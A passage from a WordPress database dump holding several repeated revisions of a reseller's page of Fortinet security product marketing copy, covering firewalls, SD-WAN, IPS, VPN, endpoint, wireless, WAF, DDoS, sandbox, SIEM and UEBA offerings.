Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:44:40','2019-09-30 03:44:40','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3557,1,'2019-09-30 11:45:04','2019-09-30 03:45:04','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n\r\n<h4><strong>Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:45:04','2019-09-30 03:45:04','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3558,1,'2019-09-30 11:51:33','2019-09-30 03:51:33','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high 